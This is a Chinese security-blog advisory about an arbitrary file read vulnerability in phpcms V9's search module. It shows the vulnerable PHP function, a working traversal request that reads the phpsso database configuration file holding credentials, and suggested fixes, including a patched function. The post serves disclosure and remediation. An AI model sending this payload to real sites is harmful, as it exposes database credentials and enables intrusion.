phpcms V9最新任意读文件漏洞 |

  • A+
所属分类:Seay信息安全博客

显示不全请点击全屏阅读

漏洞版本:

phpcms V9

漏洞描述:

phpcms v9的phpcmsmodulessearchindex.php存在任意文件读取漏洞

漏洞代码如下:

public function public_get_suggest_keyword() {
        $url = $_GET['url'].'&q='.$_GET['q'];

        $res = @file_get_contents($url);
        if(CHARSET != 'gbk') {
            $res = iconv('gbk', CHARSET, $res);
        }
        echo $res;
    }
<* 参考

http://bugscan.net/manage/node/64

*>

测试方法:

@Sebug.net   dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

  1. /index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php

安全建议:

升级到最新版本 sebug 临时解决方案: 禁止mysql数据库外链. 给数据库单独的用户权限,不要给root权限. 或者直接手工修改为: public function public_get_suggest_keyword() { $url = $_GET['url'].'&amp;q='.$_GET['q']; $trust_url = array('c8430fcf851e85818b546addf5bc4dd3'); $urm_md5 = md5($url); if (!in_array($urm_md5, $trust_url)) exit; $res = @file_get_contents($url); if(CHARSET != 'gbk') { $res = iconv('gbk', CHARSET, $res); } echo $res; }

Tags:

phpcms漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡
phpcms V9最新任意读文件漏洞 |